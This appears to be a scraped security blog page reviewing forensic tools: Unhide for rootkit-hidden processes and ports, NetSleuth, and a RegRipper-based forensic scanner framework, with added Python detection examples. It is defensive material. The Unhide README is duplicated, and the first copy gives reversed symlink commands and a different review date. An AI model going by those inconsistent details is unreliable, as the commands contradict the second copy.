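Only a SYN-ACK is counted as proof of a listening port; a client's SYN alone proves nothing about the server. That is the same distinction the "silent portscanning" claim in the NetSleuth post relies on: no probe is sent, so only what the hosts themselves reveal is recorded.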
Reviewed by 0x000216 on Monday, February 18, 2013
Unhide - forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hiding technique
Unhide is a forensic tool to find processes and TCP/UDP ports hidden by rootkits, LKMs or another hiding technique.
Unhide (unhide-linux or unhide-posix)
Features -
Detecting hidden processes. Implements six main techniques:
1- Compare /proc vs /bin/ps output
2- Compare info gathered from /bin/ps with info gathered by walking through the procfs. ONLY for the unhide-linux version
3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).
4- Full PID space occupation (PID brute-forcing). ONLY for the unhide-linux version
5- Compare /bin/ps output vs /proc, procfs walking and syscalls. ONLY for the unhide-linux version
Reverse search: verify that all threads seen by ps are also seen by the kernel.
6- Quick compare of /proc, procfs walking and syscalls vs /bin/ps output. ONLY for the unhide-linux version
It is about 20 times faster than tests 1+2+3 but may give more false positives.
Unhide_rb
It is a back-port to C of the Ruby unhide.rb.
Like the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse":
- it performs three tests fewer (kill, opendir and chdir),
- it only runs /bin/ps once at start and once for the double check,
- its tests are less accurate (e.g. testing the return value instead of errno),
- processes are only identified by their exe link (unhide-linux also uses cmdline and the "sleeping kernel process" name),
- there is little protection against failures (a failed fopen or popen, for example),
- there is no logging capability.
It is very quick, about 80 times quicker than "unhide-linux quick reverse".
Unhide-TCP
Identifies TCP/UDP ports that are listening but not listed by /sbin/ss or /bin/netstat.
It uses two methods:
- brute force of all available TCP/UDP ports, compared with the ss/netstat output.
- probing of all TCP/UDP ports not reported by netstat.
Files
unhide-linux.c -- Hidden processes, for Linux >= 2.6
unhide-linux.h
unhide-tcp.c -- Hidden TCP/UDP Ports
unhide-tcp-fast.c
unhide-tcp.h
unhide-output.c -- Common routines of unhide tools
unhide-output.h
unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby)
unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, Linux 2.2 / 2.4)
It doesn't implement the PID brute-forcing check yet. Needs more testing.
Warning: this version is somewhat outdated and may generate false positives.
Prefer unhide-linux.c if you can use it.
changelog -- As the name implied log of the change to unhide
COPYING -- License file, GNU GPL V3
LEEME.txt -- Spanish version of this file
LISEZ-MOI.TXT -- French version of this file
NEWS -- Release notes
README.txt -- This file
sanity.sh -- unhide-linux testsuite file
TODO -- Evolutions to do (any volunteers ?)
man/unhide.8 -- English man page of unhide
man/unhide-tcp.8 -- English man page of unhide-tcp
man/fr/unhide.8 -- French man page of unhide
man/fr/unhide-tcp.8 -- French man page of unhide-tcp
Compiling
If you ARE using a Linux kernel >= 2.6
gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux
gcc -Wall -O2 --static unhide_rb.c -o unhide_rb
gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp
ln -s unhide unhide-linux
Else (Linux < 2.6, *BSD, Solaris and other Unices)
gcc --static unhide-posix.c -o unhide-posix
ln -s unhide unhide-posix
Using
You MUST be root to use unhide-linux and unhide-tcp.
Examples:
# ./unhide-linux -vo quick reverse
# ./unhide-linux -vom procall sys
# ./unhide_rb
# ./unhide-tcp -flov
# ./unhide-tcp -flovs
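To make the techniques listed above concrete, here is an added example in Python, not code from the unhide project, that reimplements technique 1 (ps output vs the /proc listing) and technique 4 (kill(pid, 0) over the whole PID space) together with the double check unhide relies on. It is Linux only. It also handles the classic false positive of the brute-force method: thread IDs live in the same number space as PIDs and kill(tid, 0) succeeds for them, but only thread-group leaders appear as /proc/<pid>, so /proc/<pid>/task has to be read as well. kill(pid, 0) returns EPERM rather than ESRCH for other users' processes, so the brute force works without root, although the README's requirement stands for unhide itself.

```python
"""Find processes hidden from ps or /proc by brute-forcing the PID space
(added example, not code from the unhide project; Linux only)."""
import os
import shutil
import subprocess
import time


def pid_max():
    """Largest PID the running kernel hands out."""
    with open("/proc/sys/kernel/pid_max") as f:
        return int(f.read())


def pid_alive(pid):
    """Ask the kernel directly: kill(pid, 0) delivers no signal but reports existence.

    ESRCH -> no such process; EPERM -> exists but belongs to someone else; success -> exists.
    """
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def procfs_pids(include_threads=False):
    """IDs visible through /proc: thread-group leaders, optionally every thread too.

    Thread IDs share the PID space with processes and answer kill(tid, 0), but
    only leaders show up as /proc/<pid>; without /proc/<pid>/task every thread of
    a multithreaded process would be reported as hidden.
    """
    ids = {int(n) for n in os.listdir("/proc") if n.isdigit()}
    if include_threads:
        for pid in list(ids):
            try:
                ids |= {int(t) for t in os.listdir("/proc/%d/task" % pid)}
            except OSError:
                pass  # exited between the two listings
    return ids


def ps_pids():
    """PIDs that ps reports, or None when ps is missing or fails (minimal containers)."""
    if shutil.which("ps") is None:
        return None
    r = subprocess.run(["ps", "-e", "-o", "pid"], capture_output=True, text=True)
    if r.returncode != 0:
        return None
    return {int(tok) for tok in r.stdout.split() if tok.isdigit()}


def bruteforce_pids(limit=None):
    """Every ID in 1..limit that the kernel acknowledges via kill(pid, 0)."""
    limit = limit or pid_max()
    return {pid for pid in range(1, limit + 1) if pid_alive(pid)}


def hidden_pids(limit=None, recheck_delay=0.5):
    """Map pid -> reasons, for IDs the kernel knows about but /proc or ps do not show.

    Anything that exits between passes looks hidden, so each candidate is
    re-tested after a delay and must still be alive and still missing
    (the 'double check' unhide performs).
    """
    brute, leaders, ps = bruteforce_pids(limit), procfs_pids(), ps_pids()
    candidates = brute - procfs_pids(include_threads=True)
    if ps is not None:  # technique 1: in /proc but not in ps
        candidates |= {p for p in leaders - ps if limit is None or p <= limit}
    if not candidates:
        return {}
    time.sleep(recheck_delay)
    leaders2, visible2, ps2 = procfs_pids(), procfs_pids(include_threads=True), ps_pids()
    confirmed = {}
    for pid in sorted(candidates):
        if not pid_alive(pid):
            continue  # transient process, not a hidden one
        reasons = []
        if pid not in visible2:
            reasons.append("alive per kill(2) but absent from /proc")
        elif ps2 is not None and pid in leaders2 and pid not in ps2:
            reasons.append("present in /proc but missing from ps output")
        if reasons:
            confirmed[pid] = reasons
    return confirmed


def self_check():
    """Sanity check: the running interpreter must be seen by every method."""
    me, ps = os.getpid(), ps_pids()
    return pid_alive(me) and me in procfs_pids() and (ps is None or me in ps)


if __name__ == "__main__":
    assert self_check(), "methods disagree about this very process; do not trust results"
    for pid, why in hidden_pids().items():
        print("hidden PID %d: %s" % (pid, "; ".join(why)))
```

Two caveats a practitioner should keep in mind: a /proc mounted with hidepid=1 or 2 legitimately hides other users' processes from an unprivileged caller, so run it as root there or every foreign process will be reported; and a rootkit that hooks the kill syscall itself can lie to this check, which is why unhide combines several independent techniques rather than trusting one.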
Download -
unhide-20121229.tgz
Download WinUnhide.zip (38.5 kB)
http://www.unhide-forensics.info
Screenshot-
or by another hiding technique.
Unhide (unhide-linux or unhide-posix)
Features -
Detecting hidden processes. Implements six main techniques
1- Compare /proc vs /bin/ps output
2- Compare info gathered from /bin/ps with info gathered by walking thru the procfs. ONLY for unhide-linux version
3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).
4- Full PIDs space ocupation (PIDs bruteforcing). ONLY for unhide-linux version
5- Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version
Reverse search, verify that all thread seen by ps are also seen in the kernel.
6- Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version
It's about 20 times faster than tests 1+2+3 but maybe give more false positives.
Unhide_rb
It's a back port in C language of the ruby unhide.rb
As the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse" :
- it makes three tests less (kill, opendir and chdir),
- it only run /bin/ps once at start and once for the double check,
- also, its tests are less accurate (e.g.. testing return value instead of errno),
- processes are only identified by their exe link (unhide-linux also use cmdline and
"sleeping kernel process" name),
- there's little protection against failures (failed fopen or popen by example),
- there's no logging capability.
It is very quick, about 80 times quicker than "unhide-linux quick reverse"
Unhide-TCP
Identify TCP/UDP ports that are listening but not listed in sbin/ss or /bin/netstat.
It use two methods:
- brute force of all TCP/UDP ports availables and compare with SS/netstat output.
- probe of all TCP/UDP ports not reported by netstat.
Files
unhide-linux.c -- Hidden processes, for Linux >= 2.6
unhide-linux.h
unhide-tcp.c -- Hidden TCP/UDP Ports
unhide-tcp-fast.c
unhide-tcp.h
unhide-output.c -- Common routines of unhide tools
unhide-output.h
unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby)
unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, linux 2.2 / 2.4)
It doesn't implement the PID brute-forcing check yet. Needs more testing.
Warning: This version is somewhat outdated and may generate false positives.
Prefer unhide-linux.c if you can use it.
changelog -- As the name implies, log of the changes to unhide
COPYING -- License file, GNU GPL V3
LEEME.txt -- Spanish version of this file
LISEZ-MOI.TXT -- French version of this file
NEWS -- Release notes
README.txt -- This file
sanity.sh -- unhide-linux testsuite file
TODO -- Evolutions to do (any volunteers ?)
man/unhide.8 -- English man page of unhide
man/unhide-tcp.8 -- English man page of unhide-tcp
man/fr/unhide.8 -- French man page of unhide
man/fr/unhide-tcp.8 -- French man page of unhide-tcp
Compiling
If you ARE using a Linux kernel >= 2.6
gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux
gcc -Wall -O2 --static unhide_rb.c -o unhide_rb
gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp
ln -s unhide-linux unhide
Else (Linux < 2.6, *BSD, Solaris and other Unices)
gcc --static unhide-posix.c -o unhide-posix
ln -s unhide-posix unhide
Using
You MUST be root to use unhide-linux and unhide-tcp.
Examples:
# ./unhide-linux -vo quick reverse
# ./unhide-linux -vom procall sys
# ./unhide_rb
# ./unhide-tcp -flov
# ./unhide-tcp -flovs
Download -
unhide-20121229.tgz
Download WinUnhide.zip (38.5 kB)
Current Stable Version:
--> 2012-12-29
[ Changelog ]
IMPORTANT
- unhide-linux26.c was renamed to unhide-linux.c
- unhide.c was renamed to unhide-posix.c
- The log file of unhide-linux is renamed 'unhide-linux_AAAA-MM-DD.log'
- The log file of unhide-tcp is named 'unhide-tcp_AAAA-MM-DD.log'
- By default, unhide-tcp now uses /sbin/ss from the iproute2 package; to use netstat as before, the '-n' option must be given on the command line.
- Display is more verbose and multi-line for hidden processes (unhide-linux).
- If asked to (-l and/or -f), display is more verbose and multi-line for hidden ports (unhide-tcp).
- The sysinfo test is no longer called as part of the compound quick and sys tests, as it may give false positives.
It can still be run using the checksysinfo, checksysinfo2 or checksysinfo3 command line parameter.
NEW FEATURES
- Major enhancement of unhide-tcp:
* Add capability to output a log file (unhide-tcp_AAAA-MM-DD.log)
* Add capability to output more information (via lsof and/or fuser) on hidden ports if available
* Add verbose mode (disabled by default) to display warnings
* Add a new method (via option '-s') that is very fast on systems with a huge number of open ports
* Make a double check of port access to avoid false positives (the previous single-check version is available as unhide-tcp-simple-check.c if needed).
- Add a quick port in C language of unhide.rb (unhide_rb.c) and guess what ... it's 40 times faster than the original ruby unhide.rb
Note: unhide_rb doesn't take any option.
- Add "-d" option for doing a double check in the brute test; this reduces false positives.
- Add "-o" option as synonym of "-f".
- For found hidden processes, display the user and the working directory as extracted from the process environment.
Note that it doesn't work well for kernel processes/threads nor for daemons.
- For found hidden processes, display cmdline, exe link and internal command name.
MISCELLANEOUS
- Add French and Spanish man pages for unhide-tcp
- Update English manpage of unhide-tcp to reflect changes
- Minor corrections in French manpage of unhide
- Display copyright and license information in start banners.
- Make messages from sysinfo tests clearer.
- Add a NEWS file :)
- Update README.txt, LISEZ-MOI.txt and LEEME.txt to clarify the difference between
unhide-posix and unhide-linux.
- Remove sysinfo test from quick and sys compound tests as it may give false positives.
The sysinfo test can still be used via the checksysinfo[2|3] command line parameters.
BUG FIXES
- Suppress pedantic compilation warnings (glibc >=2.3, gcc >=4.6).
- Correct the number of processes displayed for /proc counting in sysinfo test.
Source-
http://sourceforge.net/projects/unhide/
http://www.unhide-forensics.info
Unhide - forensic tool to find hidden processes and TCP/UDP ports by
rootkits / LKMs or by another hiding technique
Reviewed by 0x000216
on
Thursday, February 14, 2013
Rating: 5
[NetSleuth] Open source Network Forensics And Analysis Tools
NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.
NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
- An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
- Free. The tool can be downloaded for free, and the source code is available under the GPL.
- Simple and cost effective. No requirement for hardware or reconfiguration of networks.
- “Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
- Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
- Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.
[NetSleuth] Open source Network Forensics And Analysis Tools
Reviewed by 0x000216
on
Saturday, November 10, 2012
Rating: 5
Extending RegRipper (aka, "Forensic Scanner")
I'll be presenting on "Extending RegRipper" at Brian Carrier's Open Source Digital Forensics Conference on 14 June, along with Cory Altheide, and I wanted to provide a bit of background with regards to what my presentation will cover...
In '98-'99, I was working for Trident Data Systems, Inc., (TDS) conducting vulnerability assessments for organizations. One of the things we did as part of this work was run ISS’s Internet Scanner (now owned by IBM) against the infrastructure; either a full, broad-brush scan or just very specific segments, depending upon the needs and wants of the organization. I became very interested in how the scanner worked, and began to note differences in how the scanner would report its findings based on the level of access we had to the systems within the infrastructure. Something else I noticed was that many of the checks that were scanned were a result of the ISS X-Force vulnerability discovery team. In short, a couple of very smart folks would discover a vulnerability, add a means of scanning for that vulnerability via the Internet Scanner framework, and roll it out to thousands of customers. Within fairly short order, this check can be rolled out to hundreds or thousands of analysts, none of whom have any prior knowledge of the vulnerability, nor have had to invest the time to investigate it. This became even more clear as I started to create an open-source (albeit proprietary) scanner to replace the use of Internet Scanner, due in large part to significant issues with inaccurate checks, and the need to adapt the output. I could create a check to be run, and give it to an analyst going on-site, and they wouldn't need to have any prior knowledge of the issue, nor would they have to invest time in discovery and analysis, but they could run the check and easily review and understand the results.
Other aspects of information security also benefit from the use of scanners. Penetration testing and web application assessments benefit from scanners that include frameworks for providing new and updated checks to be run, and many of the analysts running the scanners have no prior knowledge of the checks that are being run. Nessus (from Tenable) is a very good example of this sort of scanner; the plugins run by the scanner are text-based, providing instructions for the scanner. These plugins are easy to open and read, and provide a great deal of information regarding how the checks are constructed and run.
Given all of the benefits derived from scanners in other disciplines within information security, it just stands to reason that digital forensic analysis would also benefit from a similar framework.
The forensic scanner is not intended to replace the analyst; rather, it is intended as a framework for documenting and retaining the institutional knowledge of all analysts on the team, and remove the tedium of looking for that "low-hanging fruit" that likely exists in most, if not all, exams.
A number of commercially available forensic analysis applications (EnCase, ProDiscover) have scripting languages and scanner-like functionality; however, in most cases, this functionality is based on proprietary APIs, and in some cases, scripting languages (ProDiscover uses Perl as its scripting language, but the API for accessing the data is unique to the application).
A scanner framework is not meant to replace the use of commercial forensic analysis applications; rather, the scanner framework would augment and enhance the use of those applications, by providing an easy and efficient means for educating new analysts, as well as "sweeping up" the "low-hanging fruit", leaving the deeper analysis for the more experienced analysts.
This scanner framework would be based on easily available tools and techniques. For example, the scanner would be designed to access acquired images mounted read-only via the operating system (Linux mount command) or via freely available applications (Windows - FTK Imager v3.0, ImDisk, vhd/vmdk, etc.); that way, the scanner can make use of currently available APIs (via Perl, Python, etc.) in order to access data within the acquired image, and do so in a "forensically sound manner" (i.e., not making any changes to the original data).
The scanner is not intended to run in isolation; rather, it is intended to be used with other tools (here, here) as part of an overall process. The purpose of the scanner is to provide a means for retention, efficient deployment, and proliferation of institutional digital forensic knowledge.
Benefits
Some benefits of a forensic scanner framework such as this include, but are not limited to, the following:
1. Knowledge Retention - None of us knows everything, and we all see new things during examinations. When an analyst sees or discovers something new, a plugin can be written or updated. Once this is done, that knowledge exists, regardless of the state of the analyst (she goes on vacation, leaves for another position, etc.). Enforcing best practice documentation of the plugin ensures that as much knowledge as possible is retained along with the application, providing an excellent educational tool, as well as a ready means for adapting or improving the plugin.
2. Establish a career progression - When new folks are brought aboard a team, they have to start somewhere. In most cases, particularly with consulting organizations, skilled/experienced analysts are hired, but as the industry develops, this won't always be the case. The forensic scanner provides an ancillary framework for developing "home grown" expertise where inexperienced analysts are hired. Starting the new analysts off in a lab environment and having them begin learning the necessary procedures by acquiring and verifying media puts them in an excellent position to run the scanner. For example, the analyst either goes on-site and conducts acquisition, or acquires media sent to the lab, and prepares the necessary documentation. Then, they mount the acquired image and run the scanner, providing the more experienced analyst with the path to the acquired image and the report.
This framework also provides an objective means for personnel assessment; managers can easily track the plugins that are improved or developed by various analysts.
3. Teamwork - In many environments, development of plugins likely will not occur in a vacuum or in isolation. Plugins need to be reviewed, and can be improved based on the experience of other analysts. For example, let's say an analyst runs across a Zeus infection and decides to write a plugin for the artifacts. When the plugin is reviewed, another analyst mentions that Zeus will load differently based on the permissions of the user upon infection. The plugin can then be documented and modified to include additional conditions.
New plugins can be introduced and discussed during team meetings or through virtual conferences and collaboration, but regardless of the method, it introduces a very important aspect of forensic analysis...peer review.
4. Ease of modification - One size does not fit all. There are times when analysts will not be working with full images, but instead will only have access to selected files from systems. A properly constructed framework will provide the means necessary for accessing and scanning these limited data sets, as well. Also, reporting of the scanner can be modified according to the needs of the analyst, or organization.
5. Flexibility - A scanner framework is not limited to just acquired images. For example, F-Response provides a means of access to live, remote systems in a manner that is similar to an acquired image (i.e., much of the same API can be used, as with RegRipper), so the framework used to access images can also be used against systems accessed via F-Response. As the images themselves would be mounted read-only in order to be scanned, Volume Shadow Copies could also be mounted and scanned using the same scanner and same plugins.
Another means of flexibility comes about through the use of "idle" resources. What I mean by that is that many times, analysts working on-site or actively engaged in analysis may be extremely busy, so running the scanner and providing the output to another, off-site analyst who is not actively engaged frees up the on-site team and provides answers/solutions in a timely and efficient manner. Or, data can be provided and the off-site analyst can write a plugin based on that data, and that plugin can be run against all other systems/images. In these instances, entire images do not have to be sent to the off-site analyst, as this takes considerable time and can expose sensitive data. Instead, only very specific data is sent, making for a much smaller data set (KB as opposed to GB).
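To make the framework concrete, here is an added Python sketch (not RegRipper's or any project's code) of the pattern the post describes: plugins register with mandatory documentation metadata, are run against the path of a mounted image, and produce a report that also records whether the mount was actually read-only. The two plugins, the paths they inspect and the small image tree that demo() builds in a temporary directory are constructed for illustration.

```python
import os
import tempfile
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Plugin:
    name: str
    description: str        # what the check looks for and why it matters
    author: str
    version: str
    references: List[str]   # the write-up travels with the code
    run: Callable[[str], List[str]]


PLUGINS: Dict[str, Plugin] = {}


def plugin(name, description, author, version, references=()):
    """Decorator registering a check. The metadata is mandatory so every plugin
    carries the documentation a newer analyst needs to understand its findings."""
    def register(fn):
        PLUGINS[name] = Plugin(name, description, author, version, list(references), fn)
        return fn
    return register


def _under(root, *parts):
    return os.path.join(root, *parts)


@plugin("prefetch_inventory", "Lists Prefetch files, evidence of programs that were executed",
        "example author", "0.1", ["(placeholder reference)"])
def prefetch_inventory(root):
    d = _under(root, "Windows", "Prefetch")
    if not os.path.isdir(d):
        return []
    return sorted(n for n in os.listdir(d) if n.lower().endswith(".pf"))


@plugin("temp_executables", "Executables under Windows\\Temp, a common drop location",
        "example author", "0.1")
def temp_executables(root):
    d = _under(root, "Windows", "Temp")
    if not os.path.isdir(d):
        return []
    return sorted(n for n in os.listdir(d) if n.lower().endswith((".exe", ".dll")))


def run_scanner(image_root):
    """Run every registered plugin against a mounted image and collect a report.
    The image is expected to be mounted read-only; access(W_OK) is recorded so
    the report shows whether that precondition actually held."""
    report = {
        "image_root": image_root,
        "read_only": not os.access(image_root, os.W_OK),
        "plugins": {},
    }
    for name, p in PLUGINS.items():
        try:
            findings, status = p.run(image_root), "ok"
        except OSError as e:   # one broken plugin must not abort the whole sweep
            findings, status = [], f"error: {e}"
        report["plugins"][name] = {
            "description": p.description, "author": p.author,
            "version": p.version, "status": status, "findings": findings,
        }
    return report


def demo():
    """Build a constructed, minimal 'mounted image' in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="image-")
    os.makedirs(_under(root, "Windows", "Prefetch"))
    os.makedirs(_under(root, "Windows", "Temp"))
    for rel in (("Windows", "Prefetch", "CMD.EXE-0A1B2C3D.pf"),
                ("Windows", "Temp", "updater.exe"),
                ("Windows", "Temp", "notes.txt")):
        with open(_under(root, *rel), "w") as fh:
            fh.write("constructed sample\n")
    return run_scanner(root)


if __name__ == "__main__":
    for name, result in demo()["plugins"].items():
        print(name, result["status"], result["findings"])
```

Against a real case the argument to run_scanner() is the mount point of the acquired image (or the F-Response or shadow-copy mount the post mentions), and the report's read_only flag is the first thing to check before trusting the findings.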
Extending RegRipper (aka, "Forensic Scanner")
Reviewed by 0x000216
on
Friday, April 22, 2011
Rating: 5